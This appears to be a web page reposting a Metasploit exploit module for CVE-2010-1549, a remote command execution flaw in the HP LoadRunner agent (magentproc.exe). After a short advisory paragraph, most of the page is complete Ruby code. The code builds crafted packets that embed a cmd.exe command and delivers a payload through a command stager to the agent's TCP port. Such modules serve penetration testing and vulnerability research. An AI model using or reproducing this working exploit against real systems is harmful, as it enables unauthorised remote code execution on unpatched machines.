HP Mercury LoadRunner Agent magentproc.exe Remote Command Execution Vulnerability

This Metasploit module exploits a remote command execution vulnerability in HP LoadRunner before 9.50 and also HP Performance Center before 9.50. HP LoadRunner 12.53 and other versions are also most likely vulnerable if the (non-default) SSL option is turned off. By sending a specially crafted packet, an attacker can execute commands remotely. The service is vulnerable provided the Secure Channel feature is disabled (default).
CVE:CVE-2010-1549
 

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager
  def initialize(info={})
    super(update_info(info,
      'Name'           => "HP Mercury LoadRunner Agent magentproc.exe Remote Command Execution",
      'Description'    => %q{
        This module exploits a remote command execution vulnerablity in HP LoadRunner before 9.50
        and also HP Performance Center before 9.50. HP LoadRunner 12.53 and other versions are
        also most likely vulneable if the (non-default) SSL option is turned off.
        By sending a specially crafted packet, an attacker can execute commands remotely.
        The service is vulnerable provided the Secure Channel feature is disabled (default).
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown', # Original discovery # From Tenable Network Security
          'aushack'  # metasploit module
        ],
      'References'     =>
        [
          ['CVE', '2010-1549'],
          ['ZDI', '10-080'],
          ['BID', '39965'],
          ['URL', 'https://support.hpe.com/hpsc/doc/public/display?docId=c00912968']
        ],
      'Payload'        => { 'BadChars' => "\x0d\x0a\x00" },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # Note: software reportedly supports Linux - may also be vulnerable.
          ['Windows (Dropper)',
          'Platform'   => 'win',
          'Arch'       => [ARCH_X86, ARCH_X64]
          ],
        ],
      'Privileged'     => false,
      'Stance'         => Msf::Exploit::Stance::Aggressive,
      'DisclosureDate' => 'May 06 2010',
      'DefaultTarget'  => 0))
      register_options([Opt::RPORT(54345)])
  end
  def autofilter
    true
  end
  def execute_command(cmd, _opts = {})
    guid = Rex::Text.encode_base64(Rex::Text.rand_text_alphanumeric(17))
    randstr = Rex::Text.rand_text_alpha(16)
    server_name = Rex::Text.rand_text_alpha(7)
    server_ip = datastore['LHOST']
    server_port = Rex::Text.rand_text_numeric(4)
    # If linux is one day supported, cmd1 = /bin/sh and cmd2 = -c cmd
    cmd1 = "C:\\Windows\\system32\\cmd.exe"
    cmd2 = "/C \"#{cmd}\""
    pkt1 = [0x19].pack('N') + guid + '0'
    pkt2 = [0x6].pack('N') + [0x0].pack('N') + "(-server_type=8)(-server_name=#{server_name})(-server_full_name=#{server_name})"
    pkt2 << "(-server_ip_name=#{server_ip})(-server_port=#{server_port})(-server_fd_secondary=4)(-guid_identifier=#{guid})\x00\x00"
    pkt2 << [0x7530].pack('N')
    pkt3 = [4 + pkt2.length].pack('N') + pkt2
    pkt4 = [0x1c].pack('N') + [0x05].pack('N') + [0x01].pack('N') + randstr + pkt3
    pkt5 = [pkt4.length].pack('N') + pkt4
    pkt6 = [0x437].pack('N') + [0x0].pack('N') + [0x31].pack('N') + [1].pack('N') + [0x31000000].pack('N')
    pkt6 << [cmd1.length].pack('N') + cmd1 + "\x00" + [cmd2.length].pack('N') + cmd2 + [0x0].pack('N') + [0x0].pack('N')
    pkt7 = [4 + pkt6.length].pack('N') + pkt6
    pkt8 = [0x18].pack('N') + [0x04].pack('N') + randstr + pkt7
    pkt9 = [pkt8.length].pack('N') + pkt8
    sploit = pkt1 + pkt5 + pkt9
    connect
    sock.put(sploit)
    disconnect
 end
  def exploit
      print_status('Sending payload...')
      execute_cmdstager(linemax: 1500)
  end
end

Leave a Reply